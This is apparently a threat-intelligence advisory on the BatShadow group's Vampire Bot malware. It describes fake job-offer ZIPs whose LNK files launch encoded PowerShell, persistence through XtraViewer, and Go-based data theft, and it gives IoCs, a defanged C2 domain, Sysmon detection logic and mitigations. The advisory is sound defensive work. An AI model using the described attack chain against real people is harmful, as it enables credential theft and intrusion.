BatShadow launches Vampire Bot in fake job campaigns
Threat Group – BatShadow Group
Threat Type – Multi-stage info-stealer and remote access bot
Exploited Vulnerabilities – Social engineering, Windows default “hide known file extensions,” LNK-launched encoded PowerShell, abuse of legitimate remote access software for persistence
Malware Used – Vampire Bot (Go-compiled)
Threat Score – 7.6 🔴 High — Multi-stage chain with LNK→PowerShell execution, behaviour-evasive Go binary, and persistence via legitimate remote-access tooling. Cred theft, host profiling, screenshotting, and flexible C2 raise lateral-movement and data-loss risks.
Last Threat Observation – 8 October 2025
Overview
Vampire Bot is a newly identified, previously undocumented malware attributed to the Vietnam-linked BatShadow Group. First seen in October 2025 targeting job seekers and digital-marketing professionals, the campaign blends tailored phishing, a LNK-to-PowerShell telescoping chain, and persistence through a legitimate remote desktop product to gain durable access, exfiltrate data, and stage follow-on operations.
The critical differentiator is Vampire Bot’s Go (Golang) build, which complicates static signature detection and enables rapid re-compilation to defeat hash-based controls. The initial access arrives in ZIP archives containing a malicious .LNK disguised as a document. When launched, the LNK executes Base64-encoded PowerShell that downloads both a benign decoy document and the primary payloads, including a legitimate remote-access tool (observed: XtraViewer) used for persistence and hands-on control. The Go implant conducts host profiling, information theft, screenshot capture, and C2 beaconing to attacker infrastructure (e.g., a careers-themed domain).
The targeting of marketing and job-seeking cohorts is strategic: these personas often hold or will shortly gain access to high-value corporate SaaS (ads, analytics, social) and may bridge personal and enterprise environments, offering a stealthy beachhead into corporate networks.
Key details
Delivery method
| Vector | Details | Detection notes |
|---|---|---|
| Phishing ZIP | Tailored recruiter/job-offer theme. Archive contains a .LNK posing as a job description or corporate PDF. | Block ZIPs with LNKs. Flag double-extension lures and doc-icon shortcuts. |
| Execution deception | Exploits default Windows “hide known file extensions”; filename appears as *.pdf but is actually *.pdf.lnk. | Enforce showing file extensions; educate users to spot .lnk. |
| PowerShell stage | LNK launches encoded PowerShell to fetch a decoy PDF and a second ZIP containing XtraViewer, then executes it. | Alert on explorer.exe ➝ powershell.exe with -EncodedCommand/high-entropy args; time-correlate dual fetches. |
| Persistence via RMM | XtraViewer (legitimate remote desktop) installed/executed (often from user-writable paths) to blend with normal admin activity. | Application control: only allow sanctioned RMM; block unsigned/volatile-path execution. |
| C2 | Go binary communicates with attacker infra, can receive commands and stage modules. | DNS/HTTP egress monitoring, rare-process network baselining, beacon-timing analytics. |
Target
- Primary: Job seekers and digital-marketing professionals (contractors/freelancers included).
- Secondary: Corporate environments reachable through victims’ SaaS credentials, ad platforms, social accounts, or VPN once employment begins.
Functions
- Host profiling and environment reconnaissance to triage victim value.
- Information theft (documents, browser data, credentials, session cookies).
- Screenshot capture on configurable intervals.
- C2 command execution and payload staging for modular extension.
- Persistence and interactive access via a legitimate remote-access tool.
Obfuscation
- Go static linking and easy re-compilation undermine hash/signature detection.
- Social mimicry (job descriptions, corporate themes; file-icon spoofing).
- Living-off-the-land with PowerShell and legitimate RMM (XtraViewer) to reduce telemetry friction.
- Domain impersonation patterns (e.g., careers-themed) for C2 camouflage.
Threat actor profile – BatShadow Group
Attribution and operational cadence
BatShadow has been publicly tracked for at least a year prior to this campaign, operating from Vietnam with persistent, goal-oriented activity. The October 2025 wave focuses on job seeker/marketing demographics to harvest credentials to high-value corporate systems and to seed eventual corporate ingress once victims transition into employer environments.
Evolution and increased sophistication
Historically aligned with MaaS stealers (e.g., Lumma, Agent Tesla), BatShadow’s move to the custom Go-based Vampire Bot represents a capability elevation: bespoke C2, tuned evasion, and resilience against law-enforcement takedowns that frequently disrupt commodity stealer ecosystems. Proprietary tooling reduces dependence on rented infrastructure and extends operational longevity.
Strategic intent and targeting analysis
By compromising individuals at the edge—especially those using personal devices while job hunting—BatShadow creates beachheads outside traditional corporate perimeters. Vampire Bot’s likely info-stealing and RAT features enable credential collection, SaaS account control (ads/social), spear-phishing into employers, and pivoting via VPN once hired.
Technical deep dive – Go binary and telescoping chain
Why Go matters to defence
- Massive statically linked executables complicate AV heuristics and inflate noise for static inspection.
- Re-compilation with minor source changes yields completely new hashes, rendering hash allow/block-lists brittle.
- Symbol stripping hinders reversing; defenders need Go-aware tooling (e.g., pclntab parsing) to recover function metadata and accelerate triage.
Infection chain mapped to MITRE ATT&CK
| Stage | ATT&CK | What to watch for |
|---|---|---|
| Initial access | TA0001 / T1566.001 Spear-phishing attachment | ZIPs with LNK masquerading as PDFs/docs; decoy+payload pairing. |
| User execution | TA0002 / T1204.001 | Shortcut double-click leading to PowerShell; doc-icon .lnk with hidden extension. |
| Command & scripting | T1059.001 PowerShell | -EncodedCommand, long Base64/entropy; outbound fetch of two artifacts (decoy + payload). |
| Persistence | TA0003 / T1547.001 (potential) | RMM foothold; auto-start via registry/startup if configured. |
| Defence evasion | TA0005 / T1036 | Legitimate tool execution from %TEMP%/Downloads, unsigned binaries, rare/first-seen processes. |
| Collection | TA0009 / T1113 Screen capture | API calls suggesting desktop capture by untrusted processes. |
| C2 | TA0011 / T1071 | Regular-interval beacons to new/low-reputation domains. |
Operational note: Some lures instruct victims to use Microsoft Edge for follow-on downloads to bypass stricter Chrome defaults—evidence of pre-tested social engineering.
Known Indicators of Compromise (IoCs)
Treat all network indicators as defanged and contextual. Validate internally before enforcement.
Network
- Domains:
api3[.]samsungcareers[.]work(observed C2) - Beaconing pattern: Regular-interval DNS/HTTPS from first-seen or unsigned processes to new/low-reputation destinations.
Files and persistence
- Artifacts:
.lnkfiles with document icons and double extensions (e.g.,*.pdf.lnk) in Downloads/email temp paths. - RMM foothold: XtraViewer binaries/components executed or installed from %TEMP%, %APPDATA%, Downloads, or launched directly by script interpreters.
- Go payloads: Large, unsigned, first-seen executables in user-writable paths.
Process and telemetry
| Type | Indicator (contextual) | Confidence |
|---|---|---|
| Process ancestry | explorer.exe ➝ powershell.exe with -EncodedCommand or high-entropy command lines | High |
| Dual fetch sequence | PowerShell retrieves a decoy PDF followed by a payload ZIP/EXE | Medium–High |
| Screen capture | Untrusted process invoking screen-capture-related APIs | Medium |
Hashes
- Not publicly verified for Vampire Bot at time of writing; prefer behaviour-based detections until vendor-confirmed hashes are available.
Detection engineering and rules of thumb
High-fidelity behavioural detections
- LNK → Encoded PowerShell pivot
Parentexplorer.exespawningpowershell.exewith-EncodedCommandor high-entropy arguments. - Unusual binary execution from volatile paths
Unsigned executables or legitimate RMMs (XtraViewer) starting from %TEMP% / %APPDATA% / Downloads. - Beaconing and rare process egress
First-seen processes generating regular-interval egress to new/low-reputation domains; correlate with process age and signer. - Screen capture from untrusted process
API usage consistent with desktop capture by recently dropped, unsigned processes.
Sysmon/EDR logic suggestions
- Process Create:
ParentImage = *\explorer.exeANDImage = *\powershell.exeAND (CommandLine CONTAINS "-EncodedCommand"ORCommandLine MATCHES base64_high_entropy_regex) - File Creation/Load:
TargetFilename MATCHES *\Downloads\* OR *\AppData\*\Temp\*AND (ImageSigned=falseORPublisher NOT IN allowlist) - Network: Beaconing detector for new binaries:
first_seen_processANDregular_interval_outboundANDdest_domain_age < 30dORdomain_reputation=low.
Mitigation and prevention
The 3 Cs — immediate actions
Containment
Isolate endpoints showing the LNK→PowerShell chain, dual downloads, or unsanctioned RMM installs. Acquire memory and volatile data for triage.
Contextual detection
Emphasise behavioural detections: parent-child pivots, encoded commands, rare process egress, volatile-path execution, and screen-capture activity.
Countermeasures
Disable “Hide extensions for known file types.” Enforce application allow-listing and strictly control RMM usage by publisher and path.
Mitigation Checklist
| Category | Control / Action | Objective | Verification / Status |
|---|---|---|---|
| User Awareness & Training | Conduct targeted awareness campaigns for HR, marketing, and recruitment teams about ZIP + LNK phishing and hidden file extensions. Include real-world simulation exercises. | Prevent social engineering success through user education. | ☐ Implemented ☐ In Progress ☐ Gap |
| Email & Attachment Filtering | Block inbound ZIP archives containing .LNK or executable files. Apply sandbox detonation for attachments using recruiter or job-offer themes. | Stop the initial infection vector before delivery to the endpoint. | ☐ ☐ ☐ |
| File Extension Visibility | Enforce Group Policy to disable “Hide extensions for known file types” across all Windows endpoints. | Defeat the visual deception used in Vampire Bot lures. | ☐ ☐ ☐ |
| Endpoint Protection (EDR/AV) | Deploy EDR rules to detect explorer.exe ➝ powershell.exe -EncodedCommand execution, large unsigned Go binaries, and PowerShell-launched RMM installs. | Detect high-fidelity behavioural indicators of compromise. | ☐ ☐ ☐ |
| Application Control / Whitelisting | Allow only approved remote access tools (e.g., legitimate RMM). Block unsanctioned software such as XtraViewer when not explicitly authorized. Restrict binary execution from %TEMP%, Downloads, and AppData. | Eliminate malicious persistence via legitimate tools or transient directories. | ☐ ☐ ☐ |
| PowerShell Hardening | Enable Constrained Language Mode where practical. Require signed scripts, enforce execution policy, and enable full Script Block Logging and transcription to SIEM. | Limit abuse of PowerShell for encoded or obfuscated payloads. | ☐ ☐ ☐ |
| Network & DNS Monitoring | Monitor for regular-interval beaconing and connections to new or low-reputation domains (e.g., careers-themed). Alert on unusual JA3/SNI patterns from unsigned binaries. | Detect C2 communications and data exfiltration activity. | ☐ ☐ ☐ |
| SaaS and Identity Security | Enforce MFA/2FA across all SaaS and corporate accounts. Monitor for unusual logins from new devices or regions. | Reduce the value of stolen credentials. | ☐ ☐ ☐ |
| System Hardening & Patching | Apply latest OS and browser updates. Enable SmartScreen, Attack Surface Reduction (ASR) rules, and disable legacy scripting engines. | Reduce exploit surface and block common file-based attacks. | ☐ ☐ ☐ |
| Incident Response Readiness | Update playbooks for LNK-to-PowerShell and Go-binary analysis. Pre-install tools such as Redress or Ghidra Go plugins for rapid reversing. | Decrease response time during live incidents involving Go malware. | ☐ ☐ ☐ |
| Threat Hunting & Continuous Monitoring | Establish recurring hunts for volatile-path executions, PowerShell encoded commands, and screen-capture API calls. Integrate telemetry with SIEM for correlation. | Maintain ongoing visibility and early detection of evolving variants. | ☐ ☐ ☐ |
| Credential & Session Hygiene | Immediately rotate passwords and revoke tokens when compromise is suspected, especially for ad-platform and marketing accounts. | Limit post-infection lateral movement and data theft. | ☐ ☐ ☐ |
| Data Loss Prevention (DLP) | Monitor for unusual outbound file transfers, screenshot exfiltration, or compressed data archives leaving endpoints. | Detect and block data theft attempts. | ☐ ☐ ☐ |
| Post-Incident Recovery | Validate that RMM tools (like XtraViewer) are removed or re-installed from trusted sources only. Perform endpoint re-imaging where compromise is confirmed. | Ensure full remediation and removal of persistent footholds. |
Risk assessment
- Likelihood: Medium–High
- Impact: High
- Detectability: Medium
- Overall: 7.6 High — warrants full incident response on confirmed cases and proactive hardening.
Conclusion
Vampire Bot marks a tactical escalation for BatShadow: from commodity stealers to a custom Go-compiled platform delivered via LNK-to-PowerShell chains, with persistence through legitimate remote-access software. Success depends on behavioural analytics, UI hardening (show extensions), and tight RMM governance. With these controls, the campaign’s noisy pivots become detectable and containable.
Sources
The Hacker News – BatShadow Group Uses New Go-Based Vampire Bot Malware to Hunt Job Seekers – https://thehackernews.com/2025/10/batshadow-group-uses-new-go-based.html
SecurityBrief - BatShade: Vietnamese threat actor expands its digital operations - https://securitybrief.asia/story/batshade-vietnamese-threat-actor-expands-its-digital-operations